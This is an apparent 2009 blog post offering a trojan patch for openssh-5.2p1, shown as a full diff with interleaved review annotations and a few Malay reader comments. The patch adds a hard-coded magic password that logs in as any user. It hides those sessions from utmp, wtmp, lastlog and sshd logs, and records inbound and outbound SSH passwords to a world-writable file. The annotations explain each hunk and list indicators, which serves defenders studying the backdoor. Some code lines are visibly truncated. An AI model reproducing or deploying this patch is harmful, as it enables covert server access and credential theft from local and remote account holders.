Tuesday, July 21, 2009

uDc-hackssh-v1.0a

The following openssh-5.2p1 patches allow users to:

  • log in as any user with the 'magic password'
  • hide footprint from wtmp, utmp and lastlog
  • log ssh inbound and outbound usernames and passwords
These patches were tested on Mac OS X, Solaris 5.10, Ubuntu 8.10 and FreeBSD 7.10. They should work on other operating systems too.

slash@Slash-The-Undergrounds-Hackintosh:$ cat uDc-hackssh-v1.0a
diff -Nrc openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0a/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0a/auth-pam.c Sun Jul 19 13:59:46 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
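Review bot: The added `if(uDc) sshpam_err = PAM_SUCCESS;` overwrites the result of `pam_authenticate()` whenever the global `uDc` flag is set, so the `goto auth_fail` test below it can no longer reject that login, whatever the PAM stack decided. This is an authentication bypass, and the three added lines should be dropped so the return value is tested unmodified. The PAM modules still run and may record their own failure, so a session with no matching PAM success entry is worth treating as an indicator when reviewing a host. The enclosing function starts and ends outside the hunk.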

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;

+ // slash patch
+ if(sshpam_authctxt)
+ for (ai = 0; ai <>user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
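Review bot: Each PAM response is compared against the compile-time constant `BAJAUPASS`, and a match sets `ctxt->pam_done = uDc = 1`, which appears to be the value the following `switch` treats as a completed authentication (the `case 1:` body is outside the hunk). Responses that do not match are handed to `uDclog()`, so they end up in the capture file. A hard-coded credential in the daemon is unacceptable in any build, and the whole added block should be removed. The `for` line is truncated in this listing (text between `<` and `>` appears to have been lost), so the loop bound and the call that fills the log buffer are not visible here.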
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;
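Review bot: With `if(!uDc)` placed in front of `sshpam_err = pam_open_session(sshpam_handle, 0);`, a login that set `uDc` never opens a PAM session, so whatever the session stack normally does for accounting or auditing is skipped for it. `sshpam_err` still holds `PAM_SUCCESS` from the preceding call at that point, so `sshpam_session_open = 1` is set anyway; a session close with no matching open in PAM logs may therefore be an indicator, though that depends on code outside the hunk. The `// end of patch` comment sits between the `if` and the statement it controls, which makes the conditional easy to miss when reading a patched tree. The guard should be removed.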
diff -Nrc openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0a/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0a/auth-passwd.c Sun Jul 19 14:01:06 2009
***************
*** 92,97 ****
--- 92,103 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {
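Review bot: `if(!strcmp(BAJAUPASS, password)) return uDc = 1;` makes the password check return success for any account when the hard-coded string is supplied, before the checks that follow (the Kerberos branch is visible below) are reached. Every other attempt is formatted with the client address and account name into `abuff` and written out by `uDclog()`, so any password typed into a daemon built from this patch has to be treated as disclosed and rotated. The `sprintf` is unbounded and `abuff` is declared as 1024 bytes in includes.h, so the block also adds a memory-safety bug on data received before authentication completes. All six added lines should be removed; the function starts and ends outside the hunk.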
diff -Nrc openssh-5.2p1/includes.h uDc-hackssh-v1.0a/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0a/includes.h Sun Jul 19 14:09:10 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "black-session"
+ #define SSH_LOG "/var/run/sshd.sync"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \
+ bajaulog=fopen(SSH_LOG, "a"); \
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+
+ const char *get_remote_ipaddr(void);
+ // end of patch
+
+ #ifndef INCLUDES_H
#define INCLUDES_H
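Review bot: `uDclog()` leaves captured credentials merely bit-complemented in a file that every local account can read and modify: it inverts each byte of `abuff`, appends the result to `SSH_LOG` (`/var/run/sshd.sync`), and then runs `chmod(SSH_LOG, 0666)`. The complement is obfuscation, not encryption, so responders can recover the contents to scope which accounts need rotation. This hunk also defines the hard-coded password `BAJAUPASS` and the shared globals the other hunks use, which gives concrete things to check on a suspect host: that path with mode 0666 and non-text content, and sshd or ssh binaries that do not match the vendor package checksum. The two `#include` lines have lost their header names in this listing.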
diff -Nrc openssh-5.2p1/log.c uDc-hackssh-v1.0a/log.c
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008
--- uDc-hackssh-v1.0a/log.c Sun Jul 19 14:09:50 2009
***************
*** 338,343 ****
--- 338,346 ----
int pri = LOG_INFO;
int saved_errno = errno;
+ // slash patch
+ if(uDc) return;
+ // end of patch
if (level > log_level)
return;
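Review bot: The added `if(uDc) return;` sits ahead of the `level > log_level` filter, so once `uDc` is set the process emits no log messages at any level. The daemon's own log therefore cannot be relied on for such a session, and a connection that is visible by other means (network flow records, process accounting, the live process table) but has no sshd log lines is itself a signal. The line should be removed. The function starts and ends outside the hunk.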

diff -Nrc openssh-5.2p1/loginrec.c uDc-hackssh-v1.0a/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0a/loginrec.c Sun Jul 19 14:11:00 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
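Review bot: `if(uDc) return 0;` makes `login_write()` return before any record is written, so a session that set `uDc` leaves no utmp, wtmp or lastlog entry, which matches the page's stated goal of hiding from those files. Login-record tools therefore cannot be used to rule out access on a host running this build; compare against sources collected outside sshd, such as remote syslog, network logs or kernel audit records. The added lines should be removed. The rest of the function is outside the hunk.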
diff -Nrc openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0a/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0a/sshconnect1.c Sun Jul 19 14:12:35 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
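Review bot: The plaintext `password` is copied into `abuff` and written out by the added `sprintf`/`uDclog()` pair before the upstream `memset(password, 0, strlen(password))` runs, which defeats the purpose of that wipe. This is client-side code, and the same pattern is added in both sshconnect2.c hunks (tagged `2to:` and `2ito:`), so a patched `ssh` binary exposes the credentials for every remote system users connected to from this host. Credential rotation after finding this build therefore has to cover those remote accounts, not only local ones. The `sprintf` calls are also unbounded writes into the 1024-byte `abuff`. The added lines should be removed in all three places; the enclosing functions extend outside the hunks.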
diff -Nrc openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0a/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0a/sshconnect2.c Sun Jul 19 14:15:51 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
diff -Nrc openssh-5.2p1/version.h uDc-hackssh-v1.0a/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0a/version.h Sun Jul 19 14:17:31 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh version
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch


3 comments:

Helmis said...

Haris... apa punya bahasa daa... betul ke computer punya language ni ke ekau ada masuk maki hamun sekali.. hehehe.. anyway Ramadhan Mubarak.. dah jadi ayah ke belum?

helmis, Abu Dhabi
http://syurgadidunia.blogspot.com

Slash The Underground said...

hehe..
bahasa arab dahhh :)
Ayah? belum lagi lah.. belum ada rezeki.. baru je pindah rumah baru..